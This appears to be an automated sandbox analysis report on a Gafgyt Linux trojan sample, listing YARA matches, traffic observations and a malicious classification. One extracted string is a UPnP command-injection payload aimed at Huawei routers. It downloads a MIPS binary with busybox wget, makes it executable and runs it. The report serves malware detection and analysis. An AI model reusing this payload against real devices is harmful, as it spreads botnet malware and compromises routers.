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Source: cbr.x86.elf | ReversingLabs: Detection: 50% |
Source: global traffic | TCP traffic: -> |
Source: global traffic | TCP traffic: -> |
Source: global traffic | TCP traffic: -> |
Source: unknown | TCP traffic detected without corresponding DNS query: |
Source: unknown | TCP traffic detected without corresponding DNS query: |
Source: unknown | TCP traffic detected without corresponding DNS query: |
Source: unknown | TCP traffic detected without corresponding DNS query: |
Source: unknown | TCP traffic detected without corresponding DNS query: |
Source: unknown | TCP traffic detected without corresponding DNS query: |
Source: unknown | TCP traffic detected without corresponding DNS query: |
Source: unknown | TCP traffic detected without corresponding DNS query: |
Source: cbr.x86.elf | String found in binary or memory: |
Source: cbr.x86.elf | String found in binary or memory: |
Source: unknown | Network traffic detected: HTTP traffic on port 43928 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 42836 -> 443 |
Source: cbr.x86.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown |
Source: cbr.x86.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown |
Source: cbr.x86.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown |
Source: cbr.x86.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown |
Source: cbr.x86.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown |
Source: 6243.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown |
Source: 6243.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown |
Source: 6243.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown |
Source: 6243.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown |
Source: 6243.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="" s:encodingStyle=""><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s -l /tmp/.kx -r /cbr.mips; /bin/busybox chmod +x /tmp/.kx; /tmp/.kx huawei.mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: ELF static info symbol of initial sample | .symtab present: no |
Source: cbr.x86.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16 |
Source: cbr.x86.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16 |
Source: cbr.x86.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16 |
Source: cbr.x86.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16 |
Source: cbr.x86.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16 |
Source: 6243.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16 |
Source: 6243.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16 |
Source: 6243.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16 |
Source: 6243.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16 |
Source: 6243.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY | Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16 |
Source: classification engine | Classification label: mal84.troj.linELF@0/0@0/0 |
Source: Yara match | File source: cbr.x86.elf, type: SAMPLE |
Source: Yara match | File source: 6243.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: cbr.x86.elf PID: 6243, type: MEMORYSTR |
Source: Yara match | File source: cbr.x86.elf, type: SAMPLE |
Source: Yara match | File source: 6243.1.0000000000400000.000000000040e000.r-x.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: cbr.x86.elf PID: 6243, type: MEMORYSTR |